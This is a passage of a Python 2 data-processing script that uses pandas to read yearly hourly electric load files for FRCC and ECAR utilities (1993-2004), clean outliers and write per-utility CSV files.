1994 : pd.read_fwf('%s/frcc/1994/FMPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/FMPA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/FMPA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/FMPA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/frcc/1998/FMPA98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/FMPA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
2001 : pd.read_csv('%s/frcc/2001/FMPA01' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6).iloc[:, 2:-1].values.ravel(),
2002 : pd.read_csv('%s/frcc/2002/FMPA02' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
2003 : pd.read_csv('%s/frcc/2003/FMPA03' % (fulldir), header=None, sep='\t', skipinitialspace=True, skiprows=7).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/frcc/2004/FMPA04' % (fulldir), header=None, sep=' ', skipinitialspace=True, skiprows=6, skipfooter=1).iloc[:, 1:].values.ravel()
},
6455 : {
1993 : pd.read_csv('%s/frcc/1993/FPC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1994 : pd.read_csv('%s/frcc/1994/FPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
1995 : pd.read_csv('%s/frcc/1995/FPC95' % (fulldir), engine='python', header=None)[0].values,
1996 : pd.read_excel('%s/frcc/1996/FPC96' % (fulldir), header=None, skiprows=2, skipfooter=1).iloc[:, 6:].values.ravel(),
1998 : pd.read_excel('%s/frcc/1998/FPC98' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
1999 : pd.read_excel('%s/frcc/1999/FPC99' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
2000 : pd.read_excel('%s/frcc/2000/FPC00' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
2001 : pd.read_excel('%s/frcc/2001/FPC01' % (fulldir), header=None, skiprows=5).iloc[:, 7:].values.ravel(),
2002 : pd.read_excel('%s/frcc/2002/FPC02' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel(),
2004 : pd.read_excel('%s/frcc/2004/FPC04' % (fulldir), header=None, skiprows=4).iloc[:, 7:].values.ravel()
},
6452 : {
1993 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1993/FPL93' % (fulldir), 'r').readlines()]).iloc[:365, :24].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1994 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1994/FPL94' % (fulldir), 'r').readlines()]).iloc[3:, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1995 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1995/FPL95' % (fulldir), 'r').readlines()[3:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1996 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1996/FPL96' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1997 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1997/FPL97' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1998 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1998/FPL98' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
1999 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/1999/FPL99' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2000 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2000/FPL00' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2001 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2001/FPL01' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2002 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2002/FPL02' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2003 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2003/FPL03' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel(),
2004 : pd.DataFrame([i.split('\t') for i in open('%s/frcc/2004/FPL04' % (fulldir), 'r').readlines()[4:]]).iloc[:730, 1:13].apply(lambda x: x.str.replace('\r\n', '').str.replace('"', '').str.replace(',', '')).replace('', np.nan).astype(float).values.ravel()
},
9617 : {
1993 : pd.read_csv('%s/frcc/1993/JEA93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1994 : pd.read_csv('%s/frcc/1994/JEA94' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1996 : pd.read_fwf('%s/frcc/1996/JEA96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/JEA97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/frcc/1998/JEA98' % (fulldir), sep='\t', header=None)[2].values,
1999 : pd.read_csv('%s/frcc/1999/JEA99' % (fulldir), sep='\t', header=None)[2].values,
2000 : pd.read_excel('%s/frcc/2000/JEA00' % (fulldir), header=None)[2].values,
2001 : pd.read_excel('%s/frcc/2001/JEA01' % (fulldir), header=None, skiprows=2)[2].values,
2002 : pd.read_excel('%s/frcc/2002/JEA02' % (fulldir), header=None, skiprows=1)[2].values,
2003 : pd.read_excel('%s/frcc/2003/JEA03' % (fulldir), header=None, skiprows=1)[2].values,
2004 : pd.read_excel('%s/frcc/2004/JEA04' % (fulldir), header=None, skiprows=1)[2].values
},
10376 : {
1994 : pd.read_csv('%s/frcc/1994/KUA94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/frcc/1995/KUA95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/frcc/1997/KUA97' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
2001 : pd.read_csv('%s/frcc/2001/KUA01' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/frcc/2002/KUA02' % (fulldir), skipfooter=1, header=None, sep=' ', skipinitialspace=True).iloc[:, 1:].values.ravel()
},
14610 : {
1993 : pd.read_fwf('%s/frcc/1993/OUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/OUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/OUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/OUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/OUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/frcc/1998/OUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/OUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/OUC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/frcc/2001/OUC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/frcc/2002/OUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
18454 : {
1993 : pd.read_fwf('%s/frcc/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/frcc/1998/TECO98' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
1999 : pd.read_csv('%s/frcc/1999/TECO99' % (fulldir), engine='python', skiprows=3, header=None)[0].values,
2000 : pd.read_csv('%s/frcc/2000/TECO00' % (fulldir), engine='python', skiprows=3, header=None)[0].str[:4].astype(int).values,
2001 : pd.read_csv('%s/frcc/2001/TECO01' % (fulldir), skiprows=3, header=None)[0].values,
2002 : pd.read_csv('%s/frcc/2002/TECO02' % (fulldir), sep='\t').loc[:, 'HR1':].values.ravel(),
2003 : pd.read_csv('%s/frcc/2003/TECO03' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True).iloc[:, 2:].values.ravel()
},
21554 : {
1993 : pd.read_fwf('%s/frcc/1993/SECI93' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1994 : pd.read_fwf('%s/frcc/1994/SECI94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1995 : pd.read_fwf('%s/frcc/1995/SECI95' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1996 : pd.read_fwf('%s/frcc/1996/SECI96' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1997 : pd.read_fwf('%s/frcc/1997/SECI97' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1999 : pd.read_fwf('%s/frcc/1999/SECI99' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
2000 : pd.read_fwf('%s/frcc/2000/SECI00' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
2002 : pd.read_fwf('%s/frcc/2002/SECI02' % (fulldir), header=None).iloc[:, 3:].values.ravel(),
2004 : pd.read_fwf('%s/frcc/2004/SECI04' % (fulldir), header=None).iloc[:, 3:].values.ravel()
}
}
frcc[6455][1995][frcc[6455][1995] > 10000] = 0
frcc[9617][2002][frcc[9617][2002] > 10000] = 0
frcc[10376][1995][frcc[10376][1995] > 300] = 0
if not os.path.exists('./frcc'):
os.mkdir('frcc')
for k in frcc.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(frcc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(frcc[k][i]))) for i in frcc[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./frcc/%s.csv' % k)
###### ECAR
# AEP: 829
# APS: 538
# AMPO: 40577
# BREC: 1692
# BPI: 7004
# CEI: 3755
# CGE: 3542
# CP: 4254
# DPL: 4922
# DECO: 5109
# DLCO: 5487
# EKPC: 5580
# HEC: 9267
# IPL: 9273
# KUC: 10171
# LGE: 11249
# NIPS: 13756
# OE: 13998
# OVEC: 14015
# PSI: 15470
# SIGE: 17633
# TE: 18997
# WVPA: 40211
# CINRGY: 3260 -> Now part of 3542
# FE: 32208
# MCCP:
ecar = {
829 : {
1993 : pd.read_fwf('%s/ecar/1993/AEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/AEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/AEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/AEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/AEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/AEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/AEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/AEP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/AEP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AEP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AEP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AEP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
538 : {
1993 : pd.read_fwf('%s/ecar/1993/APS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/APS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/APS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40577 : {
2001 : pd.read_fwf('%s/ecar/2001/AMPO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/AMPO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/AMPO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/AMPO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
1692 : {
1993 : pd.read_fwf('%s/ecar/1993/BREC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/BREC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/BREC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/BREC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/BREC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/BREC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BREC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BREC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BREC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BREC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BREC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BREC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
7004 : {
1994 : pd.read_fwf('%s/ecar/1994/BPI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/BPI99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/BPI00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/BPI01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/BPI02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/BPI03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/BPI04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3755 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CEI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3542 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CIN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/CIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/CIN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/CIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/CIN00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/CIN01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/CIN02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/CIN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/CIN04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4254 : {
1993 : pd.read_fwf('%s/ecar/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4922 : {
1993 : pd.read_fwf('%s/ecar/1993/DPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5109 : {
